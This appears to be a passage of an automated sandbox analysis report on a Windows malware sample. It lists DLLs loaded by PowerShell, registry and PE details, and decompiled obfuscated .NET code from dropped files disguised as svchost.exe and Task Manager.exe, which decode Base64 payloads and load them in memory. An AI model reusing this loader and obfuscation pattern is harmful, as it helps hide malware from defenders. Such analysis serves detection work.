                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: dLRcE11Dkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: dLRcE11Dkl.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: dLRcE11Dkl.exeStatic file information: File size 1801728 > 1048576
                        Source: dLRcE11Dkl.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1b7400
                        Source: dLRcE11Dkl.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: DC:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp
                        Source: Binary string: C:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.SAbUtm3FuD1geH6MZGU8SU1Z985RHBZiQAp2wOzlAMVQgmNBd7I,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._4UAtMcj92PErTJ7iYByfV9208mv9STJNNYtSqFciQ5iDcVwI0fw,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._83oOX4R0XjtQnv8lUVK9DqZ98PiUaZGu1c2jT1KiAtLqbEDbyfB,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.kxzOsS0LVEPkY4t6cTA7vLnZuLxuF1umttA7vJQGCz0D5n9CR8P,IAdtlBkckGw.XNVguCbI3cVHcP1uRwC7TKGqLfj122dlzqP8ieQ9mctf6lSzq6DWmsjACXSXRodoOOLLcCMdDt4ug7Xyo9Nam4()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FpLD7D4ZCq6[2],IAdtlBkckGw.wsxo9ElBPCWUiK5mgsMnznNx8mHBsB9j0XYSdDNof23sXyNu2NaWUuzO8pmMLINZRt1iT3mCa5R0km4EJisc08(Convert.FromBase64String(FpLD7D4ZCq6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { FpLD7D4ZCq6[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.SAbUtm3FuD1geH6MZGU8SU1Z985RHBZiQAp2wOzlAMVQgmNBd7I,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._4UAtMcj92PErTJ7iYByfV9208mv9STJNNYtSqFciQ5iDcVwI0fw,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._83oOX4R0XjtQnv8lUVK9DqZ98PiUaZGu1c2jT1KiAtLqbEDbyfB,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.kxzOsS0LVEPkY4t6cTA7vLnZuLxuF1umttA7vJQGCz0D5n9CR8P,IAdtlBkckGw.XNVguCbI3cVHcP1uRwC7TKGqLfj122dlzqP8ieQ9mctf6lSzq6DWmsjACXSXRodoOOLLcCMdDt4ug7Xyo9Nam4()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FpLD7D4ZCq6[2],IAdtlBkckGw.wsxo9ElBPCWUiK5mgsMnznNx8mHBsB9j0XYSdDNof23sXyNu2NaWUuzO8pmMLINZRt1iT3mCa5R0km4EJisc08(Convert.FromBase64String(FpLD7D4ZCq6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { FpLD7D4ZCq6[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.SAbUtm3FuD1geH6MZGU8SU1Z985RHBZiQAp2wOzlAMVQgmNBd7I,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._4UAtMcj92PErTJ7iYByfV9208mv9STJNNYtSqFciQ5iDcVwI0fw,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._83oOX4R0XjtQnv8lUVK9DqZ98PiUaZGu1c2jT1KiAtLqbEDbyfB,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.kxzOsS0LVEPkY4t6cTA7vLnZuLxuF1umttA7vJQGCz0D5n9CR8P,IAdtlBkckGw.XNVguCbI3cVHcP1uRwC7TKGqLfj122dlzqP8ieQ9mctf6lSzq6DWmsjACXSXRodoOOLLcCMdDt4ug7Xyo9Nam4()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FpLD7D4ZCq6[2],IAdtlBkckGw.wsxo9ElBPCWUiK5mgsMnznNx8mHBsB9j0XYSdDNof23sXyNu2NaWUuzO8pmMLINZRt1iT3mCa5R0km4EJisc08(Convert.FromBase64String(FpLD7D4ZCq6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { FpLD7D4ZCq6[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_5ygbuQlYXzpOj5vvOa691gU3LoZoNF2rl1YqJVBxR2QJaQvrtMLpHvJqMAhFqC8Xwn0C.N6nImViohBIsnGqMDfm0TI6YNwhO0YJ6lNg5xP2ds1QCbdBp00Udb0WaX2vGNSRlRZJl,_5ygbuQlYXzpOj5vvOa691gU3LoZoNF2rl1YqJVBxR2QJaQvrtMLpHvJqMAhFqC8Xwn0C.uDnPsG6WkrYkZgozcLEvxEUsDYxfzaSdRH2TfrUHYyiTB8BAOGp4xgOv3opoJGVclxg3,_5ygbuQlYXzpOj5vvOa691gU3LoZoNF2rl1YqJVBxR2QJaQvrtMLpHvJqMAhFqC8Xwn0C.fHt2e9tVGbc4nZGRYkmh8V8FP8V5f0czothtaB2EjG78bRZiaB1coFeF235Wa1QCmGkq,_5ygbuQlYXzpOj5vvOa691gU3LoZoNF2rl1YqJVBxR2QJaQvrtMLpHvJqMAhFqC8Xwn0C.Ljf96Ze50zuw4tX37oXMLdO2Oj1sSEXIkhvWSmsYnxy9baTDJ2XnuUMSNP9TdjltI0UM,DPEF9ZxDQwL.UEhXVQIcqzW()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{xEOhLr76BNB[2],DPEF9ZxDQwL.GRbqhF4b4tF(Convert.FromBase64String(xEOhLr76BNB[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        .NET source code contains potential unpacker
                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: _39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt System.AppDomain.Load(byte[])
                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: KerdCCxFCvA System.AppDomain.Load(byte[])
                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: KerdCCxFCvA
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: _39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt System.AppDomain.Load(byte[])
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: KerdCCxFCvA System.AppDomain.Load(byte[])
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: KerdCCxFCvA
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: _39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt System.AppDomain.Load(byte[])
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: KerdCCxFCvA System.AppDomain.Load(byte[])
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs.Net Code: KerdCCxFCvA
                        Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs.Net Code: oOOMGaeCsXN System.AppDomain.Load(byte[])
                        Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs.Net Code: _7sdQawsEDgN System.AppDomain.Load(byte[])
                        Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs.Net Code: _7sdQawsEDgN
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeCode function: 0_2_00007FFD347A00BD pushad ; iretd 0_2_00007FFD347A00C1
                        Source: C:\Users\user\AppData\Roaming\All function.cmdCode function: 2_2_00007FFD347700BD pushad ; iretd 2_2_00007FFD347700C1
                        Source: C:\Users\user\AppData\Roaming\All function.exeCode function: 5_2_00007FFD347800BD pushad ; iretd 5_2_00007FFD347800C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD3464D2A5 pushad ; iretd 8_2_00007FFD3464D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD34832316 push 8B485F95h; iretd 8_2_00007FFD3483231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3468D2A5 pushad ; iretd 10_2_00007FFD3468D2A6
